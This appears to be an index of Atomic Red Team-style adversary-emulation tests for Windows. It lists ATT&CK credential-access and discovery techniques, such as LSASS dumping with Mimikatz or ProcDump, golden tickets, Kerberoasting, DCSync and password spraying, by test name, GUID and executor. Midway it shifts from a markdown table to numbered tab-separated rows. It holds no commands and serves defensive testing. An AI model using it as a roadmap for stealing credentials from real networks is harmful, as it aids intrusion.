| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 10 | Export Root Certificate with Export-Certificate | 78b274f8-acb0-428b-b1f7-7b0d0e73330a | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 11 | Export Certificates with Mimikatz | 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86 | command_prompt |
| credential-access | T1557.001 | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | 1 | LLMNR Poisoning with Inveigh (PowerShell) | deecd55f-afe0-4a62-9fba-4d1ba2deb321 | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 1 | Dump LSASS.exe Memory using ProcDump | 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 2 | Dump LSASS.exe Memory using comsvcs.dll | 2536dee2-12fb-459a-8c37-971844fa73be | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 3 | Dump LSASS.exe Memory using direct system calls and API unhooking | 7ae7102c-a099-45c8-b985-4c7a2d05790d | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 4 | Dump LSASS.exe Memory using NanoDump | dddd4aca-bbed-46f0-984d-e4c5971c51ea | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 5 | Dump LSASS.exe Memory using Windows Task Manager | dea6c349-f1c6-44f3-87a1-1ed33a59a607 | manual |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 6 | Offline Credential Theft With Mimikatz | 453acf13-1dbd-47d7-b28a-172ce9228023 | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 7 | LSASS read with pypykatz | c37bc535-5c62-4195-9cc3-0517673171d8 | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 8 | Dump LSASS.exe Memory using Out-Minidump.ps1 | 6502c8f0-b775-4dbd-9193-1298f56b6781 | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 9 | Create Mini Dump of LSASS.exe using ProcDump | 7cede33f-0acd-44ef-9774-15511300b24b | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 10 | Powershell Mimikatz | 66fb0bc1-3c3f-47e9-a298-550ecfefacbc | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 11 | Dump LSASS with createdump.exe from .Net v5 | 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 12 | Dump LSASS.exe using imported Microsoft DLLs | 86fc3f40-237f-4701-b155-81c01c48d697 | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 1 | Password Spray all Domain Users | 90bc2e54-6c84-47a5-9439-0a2a92b4b175 | command_prompt |
| credential-access | T1110.003 | Brute Force: Password Spraying | 2 | Password Spray (DomainPasswordSpray) | 263ae743-515f-4786-ac7d-41ef3a0d4b2b | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 3 | Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) | f14d956a-5b6e-4a93-847f-0c415142f07d | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 5 | WinPwn - DomainPasswordSpray Attacks | 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82 | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 6 | Password Spray Invoke-DomainPasswordSpray Light | b15bc9a5-a4f3-4879-9304-ea0011ace63a | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 8 | Password Spray using Kerbrute Tool | c6f25ec3-6475-47a9-b75d-09ac593c5ecb | powershell |
| credential-access | T1003.005 | OS Credential Dumping: Cached Domain Credentials | 1 | Cached Credential Dump via Cmdkey | 56506854-89d6-46a3-9804-b7fde90791f9 | command_prompt |
| credential-access | T1558.001 | Steal or Forge Kerberos Tickets: Golden Ticket | 1 | Crafting Active Directory golden tickets with mimikatz | 9726592a-dabc-4d4d-81cd-44070008b3af | powershell |
| credential-access | T1558.001 | Steal or Forge Kerberos Tickets: Golden Ticket | 2 | Crafting Active Directory golden tickets with Rubeus | e42d33cd-205c-4acf-ab59-a9f38f6bad9c | powershell |
| credential-access | T1649 | Steal or Forge Authentication Certificates | 1 | Staging Local Certificates via Export-Certificate | eb121494-82d1-4148-9e2b-e624e03fbf3d | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 4 | Extracting passwords with findstr | 0e56bf29-ff49-4ea5-9af4-3b81283fd513 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 5 | Access unattend.xml | 367d4004-5fc0-446d-823f-960c74ae52c3 | command_prompt |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 7 | WinPwn - sensitivefiles | 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 8 | WinPwn - Snaffler | fdd0c913-714b-4c13-b40f-1824d6c015f2 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 9 | WinPwn - powershellsensitive | 75f66e03-37d3-4704-9520-3210efbe33ce | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 10 | WinPwn - passhunt | 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 11 | WinPwn - SessionGopher | c9dc9de3-f961-4284-bd2d-f959c9f9fda5 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 12 | WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials | aaa87b0e-5232-4649-ae5c-f1724a4b2798 | powershell |
| credential-access | T1552.006 | Unsecured Credentials: Group Policy Preferences | 1 | GPP Passwords (findstr) | 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f | command_prompt |
| credential-access | T1552.006 | Unsecured Credentials: Group Policy Preferences | 2 | GPP Passwords (Get-GPPPassword) | e9584f82-322c-474a-b831-940fd8b4455c | powershell |
| credential-access | T1056.002 | Input Capture: GUI Input Capture | 2 | PowerShell - Prompt User for Password | 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 | powershell |
| credential-access | T1110.004 | Brute Force: Credential Stuffing | 3 | Brute Force:Credential Stuffing using Kerbrute Tool | 4852c630-87a9-409b-bb5e-5dc12c9ebcde | powershell |
| credential-access | T1187 | Forced Authentication | 1 | PetitPotam | 485ce873-2e65-4706-9c7e-ae3ab9e14213 | powershell |
| credential-access | T1187 | Forced Authentication | 2 | WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS | 7f06b25c-799e-40f1-89db-999c9cc84317 | powershell |
| credential-access | T1558.002 | Steal or Forge Kerberos Tickets: Silver Ticket | 1 | Crafting Active Directory silver tickets with mimikatz | 385e59aa-113e-4711-84d9-f637aef01f2c | powershell |
| credential-access | T1555.004 | Credentials from Password Stores: Windows Credential Manager | 1 | Access Saved Credentials via VaultCmd | 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 | command_prompt |
| credential-access | T1555.004 | Credentials from Password Stores: Windows Credential Manager | 2 | WinPwn - Loot local Credentials - Invoke-WCMDump | fa714db1-63dd-479e-a58e-7b2b52ca5997 | powershell |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 1 | Create Volume Shadow Copy with vssadmin | dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f | command_prompt |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 2 | Copy NTDS.dit from Volume Shadow Copy | c6237146-9ea6-4711-85c9-c56d263a6b03 | command_prompt |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 3 | Dump Active Directory Database with NTDSUtil | 2364e33d-ceab-4641-8468-bfb1d7cc2723 | command_prompt |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 4 | Create Volume Shadow Copy with WMI | 224f7de0-8f0a-4a94-b5d8-989b036c86da | command_prompt |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 5 | Create Volume Shadow Copy remotely with WMI | d893459f-71f0-484d-9808-ec83b2b64226 | command_prompt |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 6 | Create Volume Shadow Copy remotely (WMI) with esentutl | 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 | command_prompt |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 7 | Create Volume Shadow Copy with Powershell | 542bb97e-da53-436b-8e43-e0a7d31a6c24 | powershell |
| credential-access | T1003.003 | OS Credential Dumping: NTDS | 8 | Create Symlink to Volume Shadow Copy | 21748c28-2793-4284-9e07-d6d028b66702 | command_prompt |
| credential-access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | 1 | Request for service tickets | 3f987809-3681-43c8-bcd8-b3ff3a28533a | powershell |
| credential-access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | 2 | Rubeus kerberoast | 14625569-6def-4497-99ac-8e7817105b55 | powershell |
| credential-access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | 3 | Extract all accounts in use as SPN using setspn | e6f4affd-d826-4871-9a62-6c9004b8fe06 | command_prompt |
| credential-access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | 4 | Request A Single Ticket via PowerShell | 988539bc-2ed7-4e62-aec6-7c5cf6680863 | powershell |
| credential-access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | 5 | Request All Tickets via PowerShell | 902f4ed2-1aba-4133-90f2-cff6d299d6da | powershell |
| credential-access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | 6 | WinPwn - Kerberoasting | 78d10e20-c874-45f2-a9df-6fea0120ec27 | powershell |
| credential-access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | 7 | WinPwn - PowerSharpPack - Kerberoasting Using Rubeus | 29094950-2c96-4cbd-b5e4-f7c65079678f | powershell |
| credential-access | T1003.006 | OS Credential Dumping: DCSync | 1 | DCSync (Active Directory) | 129efd28-8497-4c87-a1b0-73b9a870ca3e | command_prompt |
| credential-access | T1003.006 | OS Credential Dumping: DCSync | 2 | Run DSInternals Get-ADReplAccount | a0bced08-3fc5-4d8b-93b7-e8344739376e | powershell |
| credential-access | T1056.004 | Input Capture: Credential API Hooking | 1 | Hook PowerShell TLS Encrypt/Decrypt Messages | de1934ea-1fbf-425b-8795-65fb27dd7e33 | powershell |
| discovery | T1033 | System Owner/User Discovery | 1 | System Owner/User Discovery | 4c4959bf-addf-4b4a-be86-8d09cc1857aa | command_prompt |
| discovery | T1033 | System Owner/User Discovery | 3 | Find computers where user has session - Stealth mode (PowerView) | 29857f27-a36f-4f7e-8084-4557cd6207ca | powershell |
| discovery | T1033 | System Owner/User Discovery | 4 | User Discovery With Env Vars PowerShell Script | dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 | powershell |
| discovery | T1033 | System Owner/User Discovery | 5 | GetCurrent User with PowerShell Script | 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b | powershell |
| discovery | T1033 | System Owner/User Discovery | 6 | System Discovery - SocGholish whoami | 3d257a03-eb80-41c5-b744-bb37ac7f65c7 | powershell |
| discovery | T1615 | Group Policy Discovery | 1 | Display group policy information via gpresult | 0976990f-53b1-4d3f-a185-6df5be429d3b | command_prompt |
| discovery | T1615 | Group Policy Discovery | 2 | Get-DomainGPO to display group policy information via PowerView | 4e524c4e-0e02-49aa-8df5-93f3f7959b9f | powershell |
| discovery | T1615 | Group Policy Discovery | 3 | WinPwn - GPOAudit | bc25c04b-841e-4965-855f-d1f645d7ab73 | powershell |
| discovery | T1615 | Group Policy Discovery | 4 | WinPwn - GPORemoteAccessPolicy | 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 | powershell |
| discovery | T1615 | Group Policy Discovery | 5 | MSFT Get-GPO Cmdlet | 52778a8f-a10b-41a4-9eae-52ddb74072bf | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 1 | Enumerate all accounts (Domain) | 6fbc9e68-5ad7-444a-bd11-8bf3136c477e | command_prompt |
| discovery | T1087.002 | Account Discovery: Domain Account | 2 | Enumerate all accounts via PowerShell (Domain) | 8b8a6449-be98-4f42-afd2-dedddc7453b2 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 3 | Enumerate logged on users via CMD (Domain) | 161dcd85-d014-4f5e-900c-d3eaae82a0f7 | command_prompt |
| discovery | T1087.002 | Account Discovery: Domain Account | 4 | Automated AD Recon (ADRecon) | 95018438-454a-468c-a0fa-59c800149b59 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 5 | Adfind -Listing password policy | 736b4f53-f400-4c22-855d-1a6b5a551600 | command_prompt |
| discovery | T1087.002 | Account Discovery: Domain Account | 6 | Adfind - Enumerate Active Directory Admins | b95fd967-4e62-4109-b48d-265edfd28c3a | command_prompt |
| discovery | T1087.002 | Account Discovery: Domain Account | 7 | Adfind - Enumerate Active Directory User Objects | e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 | command_prompt |
| discovery | T1087.002 | Account Discovery: Domain Account | 8 | Adfind - Enumerate Active Directory Exchange AD Objects | 5e2938fb-f919-47b6-8b29-2f6a1f718e99 | command_prompt |
| discovery | T1087.002 | Account Discovery: Domain Account | 9 | Enumerate Default Domain Admin Details (Domain) | c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef | command_prompt |
| discovery | T1087.002 | Account Discovery: Domain Account | 10 | Enumerate Active Directory for Unconstrained Delegation | 46f8dbe9-22a5-4770-8513-66119c5be63b | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 11 | Get-DomainUser with PowerView | 93662494-5ed7-4454-a04c-8c8372808ac2 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 12 | Enumerate Active Directory Users with ADSISearcher | 02e8be5a-3065-4e54-8cc8-a14d138834d3 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 13 | Enumerate Linked Policies In ADSISearcher Discovery | 7ab0205a-34e4-4a44-9b04-e1541d1a57be | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 14 | Enumerate Root Domain linked policies Discovery | 00c652e2-0750-4ca6-82ff-0204684a6fe4 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 15 | WinPwn - generaldomaininfo | ce483c35-c74b-45a7-a670-631d1e69db3d | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 16 | Kerbrute - userenum | f450461c-18d1-4452-9f0d-2c42c3f08624 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 17 | Wevtutil - Discover NTLM Users Remote | b8a563d4-a836-4993-a74e-0a19b8481bfe | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 18 | Suspicious LAPS Attributes Query with Get-ADComputer all properties | 394012d9-2164-4d4f-b9e5-acf30ba933fe | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 19 | Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property | 6e85bdf9-7bc4-4259-ac0f-f0cb39964443 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 20 | Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope | ffbcfd62-15d6-4989-a21a-80bfc8e58bb5 | powershell |
| discovery | T1087.002 | Account Discovery: Domain Account | 21 | Suspicious LAPS Attributes Query with adfind all properties | abf00f6c-9983-4d9a-afbc-6b1c6c6448e1 | powershell |
946 discovery T1087.002 Account Discovery: Domain Account 22 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd 51a98f96-0269-4e09-a10f-e307779a8b05 powershell
947 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
948 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
949 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
950 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
951 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
952 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
953 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
954 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
955 discovery T1069.002 Permission Groups Discovery: Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
956 discovery T1069.002 Permission Groups Discovery: Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
957 discovery T1069.002 Permission Groups Discovery: Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
958 discovery T1069.002 Permission Groups Discovery: Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
959 discovery T1069.002 Permission Groups Discovery: Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
960 discovery T1069.002 Permission Groups Discovery: Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
961 discovery T1069.002 Permission Groups Discovery: Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
962 discovery T1069.002 Permission Groups Discovery: Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
963 discovery T1069.002 Permission Groups Discovery: Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
964 discovery T1069.002 Permission Groups Discovery: Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
965 discovery T1069.002 Permission Groups Discovery: Domain Groups 14 Active Directory Enumeration with LDIFDE 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784 command_prompt
966 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
967 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
968 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
969 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
970 discovery T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
971 discovery T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
972 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
973 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
974 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
975 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
976 discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
977 discovery T1135 Network Share Discovery 8 WinPwn - shareenumeration 987901d1-5b87-4558-a6d9-cffcabc638b8 powershell
978 discovery T1135 Network Share Discovery 9 Network Share Discovery via dir command 13daa2cf-195a-43df-a8bd-7dd5ffb607b5 command_prompt
979 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
980 discovery T1120 Peripheral Device Discovery 2 WinPwn - printercheck cb6e76ca-861e-4a7f-be08-564caa3e6f75 powershell
981 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
982 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
983 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
984 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
985 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
986 discovery T1082 System Information Discovery 13 WinPwn - winPEAS eea1d918-825e-47dd-acc2-814d6c58c0e1 powershell
987 discovery T1082 System Information Discovery 14 WinPwn - itm4nprivesc 3d256a2f-5e57-4003-8eb6-64d91b1da7ce powershell
988 discovery T1082 System Information Discovery 15 WinPwn - Powersploits privesc checks 345cb8e4-d2de-4011-a580-619cf5a9e2d7 powershell
989 discovery T1082 System Information Discovery 16 WinPwn - General privesc checks 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed powershell
990 discovery T1082 System Information Discovery 17 WinPwn - GeneralRecon 7804659b-fdbf-4cf6-b06a-c03e758590e8 powershell
991 discovery T1082 System Information Discovery 18 WinPwn - Morerecon 3278b2f6-f733-4875-9ef4-bfed34244f0a powershell
992 discovery T1082 System Information Discovery 19 WinPwn - RBCD-Check dec6a0d8-bcaf-4c22-9d48-2aee59fb692b powershell
993 discovery T1082 System Information Discovery 20 WinPwn - PowerSharpPack - Watson searching for missing windows patches 07b18a66-6304-47d2-bad0-ef421eb2e107 powershell
994 discovery T1082 System Information Discovery 21 WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors efb79454-1101-4224-a4d0-30c9c8b29ffc powershell
995 discovery T1082 System Information Discovery 22 WinPwn - PowerSharpPack - Seatbelt 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 powershell
996 discovery T1082 System Information Discovery 25 System Information Discovery with WMIC 8851b73a-3624-4bf7-8704-aa312411565c command_prompt
997 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
998 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
999 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
1000 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
1001 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
1002 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
1003 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
1004 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
1005 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
1006 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
1007 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
1008 discovery T1016 System Network Configuration Discovery 9 DNS Server Discovery Using nslookup 34557863-344a-468f-808b-a1bfb89b4fa9 command_prompt
1009 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
1010 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
1011 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
1012 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
1013 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
1014 discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
1015 discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
1016 discovery T1482 Domain Trust Discovery 8 TruffleSnout - Listing AD Infrastructure ea1b4f2d-5b82-4006-b64f-f2845608a3bf command_prompt
1017 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
1018 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
1019 discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
1020 discovery T1083 File and Directory Discovery 6 Launch DirLister Executable c5bec457-43c9-4a18-9a24-fe151d8971b7 powershell
1021 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
1022 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
1023 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
1024 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
1025 discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
1026 discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
1027 discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
1028 discovery T1057 Process Discovery 6 Discover Specific Process - tasklist 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb command_prompt
1029 discovery T1069.001 Permission Groups Discovery: Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
1030 discovery T1069.001 Permission Groups Discovery: Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
1031 discovery T1069.001 Permission Groups Discovery: Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
1032 discovery T1069.001 Permission Groups Discovery: Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
1033 discovery T1069.001 Permission Groups Discovery: Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
1034 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
1035 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
1036 discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
1037 discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
1038 discovery T1201 Password Policy Discovery 10 Use of SecEdit.exe to export the local security policy (including the password policy) 510cc97f-56ac-4cd3-a198-d3218c23d889 command_prompt
1039 discovery T1614.001 System Location Discovery: System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
1040 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
1041 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
1042 discovery T1012 Query Registry 2 Query Registry with Powershell cmdlets 0434d081-bb32-42ce-bcbb-3548e4f2628f powershell
1043 discovery T1012 Query Registry 3 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
1044 discovery T1518.001 Software Discovery: Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
1045 discovery T1518.001 Software Discovery: Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
